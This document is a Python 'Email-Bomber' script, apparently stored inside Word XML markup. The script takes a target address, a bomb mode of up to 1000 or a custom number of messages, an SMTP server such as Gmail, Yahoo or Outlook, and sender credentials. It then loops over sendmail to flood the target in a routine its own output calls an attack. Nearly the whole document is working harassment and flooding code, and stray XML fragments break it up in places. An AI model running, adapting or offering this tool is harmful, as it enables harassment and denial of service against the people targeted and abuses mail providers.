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#imports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smtplib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sys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#part 1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class bcolors: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GREEN = '\033[92m'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YELLOW = '\033[93m'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RED = '\033[91m'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banner():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print(bcolors.GREEN + '+[+[+[ Email-Bomber v1.0 ]+]+]+')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print(bcolors.GREEN + '+[+[+[ made with codes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#part 2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class Email_Bomber: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count = 0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def __init__(self):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try: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print(bcolors.RED + '\n+[+[+[ Initializing program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self.target = str(input(bcolors.GREEN + 'Enter target email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self.mode = int(input(bcolors.GREEN + 'Enter BOMB mode (1,2,3,4) || 1:(1000) 2:(500) 3:(250) 4:(custom)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int(self.mode) &gt; int(4) or int(self.mode) &lt; int(1):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print('ERROR: Invalid Option. GoodBye.')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sys.exit(1)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except Exception as e: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print(f'ERROR: {e}')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#part 3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def bomb(self):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try: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print(bcolors.RED + '\n+[+[+[ Setting up bomb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self.amount = None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self.mode == int(1):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self.amount = int(1000)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elif self.mode == int(2):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self.amount = int(500)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elif self.mode == int(3):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self.amount = int(250)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else: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self.amount = int(input(bcolors.GREEN + 'Choose a CUSTOM amount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print(bcolors.RED + f'\n+[+[+[ You have selected BOMB mode: {self.mode} and {self.amount} emails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except Exception as e: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print(f'ERROR: {e}')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def email(self):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try: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print(bcolors.RED + '\n+[+[+[ Setting up email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self.server = str(input(bcolors.GREEN + 'Enter email server | or select premade options - 1:Gmail 2:Yahoo 3:Outlook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premade = ['1', '2', '3']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default_port = True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self.server not in premade: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default_port = False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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                self.port = int(input(bcolors.GREEN + 'Enter port number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default_port == True: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self.port = int(587)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if self.server == '1':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self.server = 'smtp.gmail.com'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elif self.server == '2':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self.server = 'smtp.mail.yahoo.com'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elif self.server == '3':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self.server = 'smtp-mail.outlook.com'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self.fromAddr = str(input(bcolors.GREEN + 'Enter from address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self.fromPwd = str(input(bcolors.GREEN + 'Enter from password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self.subject = str(input(bcolors.GREEN + 'Enter subject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self.message = str(input(bcolors.GREEN + 'Enter message &lt;: '))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self.msg = '''From: %s\nTo: %s\nSubject %s\n%s\n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''' % (self.fromAddr, self.target, self.subject, self.message)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 = smtplib.SMTP(self.server, self.port)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self.s.ehlo()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self.s.starttls()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self.s.ehlo()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self.s.login(self.fromAddr, self.fromPwd)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except Exception as e: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print(f'ERROR: {e}')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#part 4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def send(self):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try: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self.s.sendmail(self.fromAddr, self.target, self.msg)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self.count +=1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print(bcolors.YELLOW + f'BOMB: {self.count}')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except Exception as e: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print(f'ERROR: {e}')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def attack(self):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print(bcolors.RED + '\n+[+[+[ Attacking...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for email in range(self.amount+1):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self.send()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self.s.close()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print(bcolors.RED + '\n+[+[+[ Attack finished ]+]+]+')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sys.exit(0)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#part 5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__name__=='__main__':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banner()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bomb = Email_Bomber()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bomb.bomb()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bomb.email()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530DC0" w:rsidRPr="00530DC0" w:rsidRDefault="00530DC0" w:rsidP="00530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530DC0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bomb.attack()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0DC0"/>
    <w:rsid w:val="00530DC0"/>
    <w:rsid w:val="0065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0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0DC0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2020-06-29T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-29T12:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>